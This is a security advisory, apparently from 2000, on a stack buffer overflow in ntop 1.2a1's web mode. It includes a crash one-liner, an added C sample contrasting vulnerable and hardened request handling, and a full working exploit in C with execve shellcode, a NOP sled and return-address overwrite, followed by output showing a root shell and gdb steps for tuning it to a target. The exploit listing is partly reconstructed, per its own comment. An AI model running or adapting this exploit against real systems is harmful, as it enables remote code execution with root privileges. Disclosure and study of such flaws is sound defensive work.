Title: ntop has a stack-based BOF when it's requested too long
Released by: mat@hacksware.com
Date: 25th October 2000
1. Problem

 ntop run in web mode (-w) has a stack-based buffer overflow: the filename in an HTTP GET request is copied with strcpy() into a fixed-size stack buffer, so an over-long filename overwrites the return address and lets a remote client run code with ntop's privileges.

2. Tested Version

 ntop-1.2a1

 I only tested this version.

3. Example



 1. first run ntop in web mode: ntop -w 8080

 2. send a GET request whose filename is 240 bytes long:

 $ printf "GET /`perl -e 'print "A"x240'`\r\n\r\n" |nc localhost 8080

 3. ntop dies with a segmentation fault:

 $ ntop -w 8080
  ntop v.1.2a1 MT [i686-pc-linux-gnu] listening on eth0.
  Copyright 1998-99 by Luca Deri 
  Warning: unable to read file '.ntop'. No security will be used!
  Waiting for HTTP connections on port 8080...
  Segmentation fault
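To show why the 240-byte filename crashes ntop, here is an added example (not code from the advisory or from ntop itself) of the vulnerable pattern next to a hardened request handler. The buffer size PATH_MAX_DEMO, the function names extract_filename / hardened_handler / build_long_request and the request builder are assumptions made for this demo; ntop 1.2a1's real buffer size and function layout are not given on this page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed stack buffer size for this demo (ntop 1.2a1's real size is not
 * stated on the page; its overflow is triggered by a 240-byte filename). */
#define PATH_MAX_DEMO 128

/* Vulnerable pattern, the same class of bug as ntop 1.2a1's web handler:
 * the requested filename is strcpy()'d into a fixed-size stack buffer, so a
 * filename of PATH_MAX_DEMO bytes or more runs past the buffer into the saved
 * frame pointer and return address. Shown for contrast only; never call it on
 * untrusted input. */
void vulnerable_handler(const char *filename)
{
    char path[PATH_MAX_DEMO];
    strcpy(path, filename);                 /* unbounded copy: the bug */
    printf("serving %s\n", path);
}

/* Parse the request line "GET /<file> HTTP/1.x\r\n" (the PoC above sends a
 * bare "GET /<file>\r\n", which is accepted too) and copy "/<file>" into out.
 * Returns 0 on success, -1 if the line is not a GET, -2 if the filename
 * would not fit in out (including its terminating NUL). */
int extract_filename(const char *req, char *out, size_t outlen)
{
    const char *p, *end;
    size_t n;

    if (strncmp(req, "GET /", 5) != 0)
        return -1;
    p = req + 4;                            /* keep the leading '/' */
    end = p + strcspn(p, " \r\n");          /* filename ends at SP, CR or LF */
    n = (size_t)(end - p);
    if (n >= outlen)                        /* no room for the NUL: reject */
        return -2;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* Hardened handler: bounded parse, and an explicit HTTP status instead of
 * an overflow when the filename is too long. */
int hardened_handler(const char *req)
{
    char path[PATH_MAX_DEMO];
    int rc = extract_filename(req, path, sizeof path);

    if (rc == -1) return 400;               /* Bad Request */
    if (rc == -2) return 414;               /* Request-URI Too Long */
    return 200;                             /* would serve `path` here */
}

/* Build the PoC request from section 3: "GET /" + n x 'A' + "\r\n\r\n"
 * (constructed input; caller frees the result). */
char *build_long_request(size_t n)
{
    char *req = malloc(5 + n + 4 + 1);
    if (req == NULL)
        return NULL;
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', n);
    memcpy(req + 5 + n, "\r\n\r\n", 5);     /* 4 bytes plus the NUL */
    return req;
}

int main(void)
{
    char *poc = build_long_request(240);

    printf("normal request    -> %d\n",
           hardened_handler("GET /index.html HTTP/1.0\r\n\r\n"));
    printf("240-byte filename -> %d\n", hardened_handler(poc));
    vulnerable_handler("/index.html");      /* fits, so this call is fine */
    /* vulnerable_handler(poc + 4) would smash the stack exactly as the PoC does */
    free(poc);
    return 0;
}
```

The fix is not just strncpy(): the handler measures the filename first and refuses it with 414 when it cannot be stored with its NUL, so nothing is ever copied past the end of the stack buffer.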

4. Exploit



----------------------ntop-w-exp.c-----start-----------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Linux/x86 execve("/bin/sh") shellcode, 44 bytes */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage()
{
 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
 printf("                                 mat@hacksware.com\n");
 printf("Usage : ./ntop-w-exp [offset] | nc victim port\n");
 exit(0);
}

int main( int argc, char *argv[] )
{
  int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
  /* +4 so the last 4-byte address write (at offset 238) stays inside the
     buffer; only the first CODE_LEN bytes are ever sent */
  char code_buf[CODE_LEN+4];
  /* guessed stack address on the target; tune it with gdb (step 6 below) */
  uint32_t esp=0xbedffb00;

  if(argc >= 2) offset = atoi(argv[1]);

  memset(code_buf,0x90,NOP_LEN);                           /* NOP sled */
  memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));  /* shellcode after the sled */
  /* fill the rest with the guessed return address, 4 bytes at a time
     (uint32_t keeps the writes 4 bytes wide even on a 64-bit build host) */
  for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
     *(uint32_t *)&code_buf[i]=esp-offset;

  /* emit the request: "GET /" + CODE_LEN bytes + CRLF CRLF, the same shape
     as the PoC request in section 3 (the published listing is cut off at
     this loop; the output part is reconstructed from that request format) */
  printf("GET /");
  for(i=0;i<CODE_LEN;i++) putchar(code_buf[i]);
  printf("\r\n\r\n");
  return 0;
}

----------------------ntop-w-exp.c-----end-----------------------

 1. run ntop -w 8080 on overheaven (the target)

  Warning: unable to read file '.ntop'. No security will be used!
  Waiting for HTTP connections on port 8080...





 2. compile the exploit

  $ gcc -o ntop-w-exp ntop-w-exp.c

 3. send the exploit request to overheaven

  $ ./ntop-w-exp |nc overheaven 8080

 4. a shell with ntop's privileges (root here) appears on the terminal where ntop is running on overheaven

  base# hostname
  overheaven
  bash# id
  uid=0(root) gid=500(mat) groups=500(mat),0(root),200(staff)

 5. The shell is spawned on ntop's own terminal, not on the HTTP connection, so it cannot be used over the WWW port. To get something usable remotely, modify the shellcode to run a program other than "/bin/sh".

 6. If the shellcode does not run, the guessed stack address (esp in ntop-w-exp.c, adjusted by the optional offset argument) is wrong for the target: the return address written after the shellcode must land in the NOP sled in front of it. Find the real value with gdb on the target's ntop:

    1. break returnHTTPPage
    2. break strcpy
    3. send the request and, when the strcpy breakpoint is hit: x/x $esp





=================================================

|                                               |

|               mat@hacksware.com               |

|                                               |

=================================================








(C) 1999-2000 All rights reserved.